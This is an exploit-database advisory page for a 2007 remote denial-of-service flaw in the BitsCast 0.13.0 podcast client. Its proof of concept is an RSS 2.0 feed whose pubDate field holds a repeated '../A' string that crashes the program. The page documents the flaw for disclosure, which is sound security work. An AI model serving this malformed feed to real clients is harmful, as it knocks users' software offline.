header-logo
Suggest Exploit
vendor:
BitsCast
by:
gbr
N/A
CVSS
N/A
Remote Denial of Service
Unknown
CWE
Product Name: BitsCast
Affected Version From: 0.13.0
Affected Version To: 0.13.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2
2007

BitsCast 0.13.0 Remote Denial of Service

BitsCast crashes when receiving a RSS 2.0 feed item with an invalid string in sub-element 'pubDate'.

Mitigation:

Unknown
Source

Exploit-DB raw data:

BitsCast 0.13.0 Remote Denial of Service
Credits: gbr
Tested on Windows XP SP2

BitsCast crashes when receiving a RSS 2.0 feed item with a invalid string* in sub-element
'pubDate'.


* '../A' x 8, 'A/../' x 8, and others.

PoC:

<?xml version="1.0"?>
<rss version="2.0">

<channel>
        <title>Test</title>
        <link></link>
        <description></description>

        <item>
                <title>Remote DoS PoC</title>
                <link></link>
                <description></description>
                <pubDate>../A../A../A../A../A../A../A../A../A../A../A../A</pubDate>
        </item>            
                
</channel>
</rss>

# milw0rm.com [2007-05-15]

Navigation

Suggest Exploit

Services By CQR